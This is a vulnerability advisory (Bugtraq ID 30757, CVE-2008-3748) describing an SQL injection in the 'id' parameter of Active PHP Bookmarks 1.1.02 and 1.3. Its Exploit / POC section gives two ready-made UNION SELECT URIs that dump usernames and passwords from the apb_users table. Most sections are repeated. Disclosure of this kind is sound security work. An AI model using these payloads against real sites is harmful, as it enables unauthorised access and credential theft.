Active PHP Bookmarks 'id' Parameter SQL Injection Vulnerability
BID:30757
Info
Active PHP Bookmarks 'id' Parameter SQL Injection Vulnerability
| Bugtraq ID: | 30757 |
| Class: | Input Validation Error |
| CVE: |
CVE-2008-3748 |
| Remote: | Yes |
| Local: | No |
| Published: | Aug 20 2008 12:00AM |
| Updated: | May 07 2015 05:24PM |
| Credit: | Hussin X |
| Vulnerable: |
Active PHP Bookmarks Active PHP Bookmarks 1.1.2 Active PHP Bookmarks Active PHP Bookmarks 1.3 |
| Not Vulnerable: | |
Discussion
Active PHP Bookmarks 'id' Parameter SQL Injection Vulnerability
Active PHP Bookmarks is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
Active PHP Bookmarks 1.1.02 and 1.3 are vulnerable; other versions may be affected as well.
Active PHP Bookmarks is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
Active PHP Bookmarks 1.1.02 and 1.3 are vulnerable; other versions may be affected as well.
Exploit / POC
Active PHP Bookmarks 'id' Parameter SQL Injection Vulnerability
Attackers can use a browser to exploit this issue.
The following example URIs are available:
http://www.example.com/Script/view_group.php?id=-1+union+select+1,2,concat_ws(0x3a,username,password),4,5,6,7,8+from+apb_users--
http://www.example.com/path/view_group.php?id=-4+union+select+0,1,concat(username,0x3a,password),3,4,5,6,7+from+apb_users--
Attackers can use a browser to exploit this issue.
The following example URIs are available:
http://www.example.com/Script/view_group.php?id=-1+union+select+1,2,concat_ws(0x3a,username,password),4,5,6,7,8+from+apb_users--
http://www.example.com/path/view_group.php?id=-4+union+select+0,1,concat(username,0x3a,password),3,4,5,6,7+from+apb_users--
Solution / Fix
Active PHP Bookmarks 'id' Parameter SQL Injection Vulnerability
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
References
Active PHP Bookmarks 'id' Parameter SQL Injection Vulnerability
References:
References:
- Active PHP Bookmarks (APB) Homepage (Jeroen Leijen)
- Active PHP Bookmarks Homepage (Active PHP Bookmarks)